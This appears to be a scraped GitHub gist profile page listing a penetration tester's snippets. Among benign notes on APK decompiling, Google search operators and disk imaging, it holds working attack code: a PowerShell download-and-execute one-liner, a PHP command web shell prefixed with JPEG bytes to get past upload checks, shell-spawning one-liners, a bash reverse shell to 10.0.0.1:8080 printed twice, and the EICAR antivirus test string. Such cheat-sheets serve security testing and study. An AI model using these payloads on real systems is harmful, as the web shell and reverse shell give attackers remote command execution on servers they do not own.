Skip to content

Instantly share code, notes, and snippets.

View SleepyLctl's full-sized avatar

Petr Pospíšil SleepyLctl

View GitHub Profile
########################################
Execute PS script remotely
########################################
iex ((new-object net.webclient).downloadstring('https://url/install.ps1'))
@SleepyLctl
SleepyLctl / Decompiling
Last active April 9, 2018 10:06
Android Testing
APK to java
-- dex2jar + jd-gui
-- jadx
-- apktool?
https://stackoverflow.com/questions/1249973/decompiling-dex-into-java-sourcecode
@SleepyLctl
SleepyLctl / dorks.txt
Last active April 4, 2018 11:25
Google Dorks - gbhacker
intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
info:
movie:
@SleepyLctl
SleepyLctl / bypass_webshell.php
Created March 28, 2018 10:46
PHP Webshell with JPEG metadata
ÿØÿà
<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>
@SleepyLctl
SleepyLctl / links.txt
Last active March 22, 2018 11:28
Links - Malware, IR, Web Content
@SleepyLctl
SleepyLctl / TestingMalware.bat
Created March 21, 2018 15:04
Test File - Wannabe Malware
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
@SleepyLctl
SleepyLctl / shell.sh
Created December 14, 2017 14:16
Shell Spawning
Shell Spawning
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
@SleepyLctl
SleepyLctl / shells.sh
Last active March 28, 2018 08:43
Reverse Shell
Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PERL
Here’s a shorter, feature-free version of the perl-reverse-shell:
Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PERL
Here’s a shorter, feature-free version of the perl-reverse-shell:
Make an image of the device first
#################################
# dd if=/dev/target_partition of=/home/user/partition.image
fdisk -l
# fsck
# strings /dev/sda | grep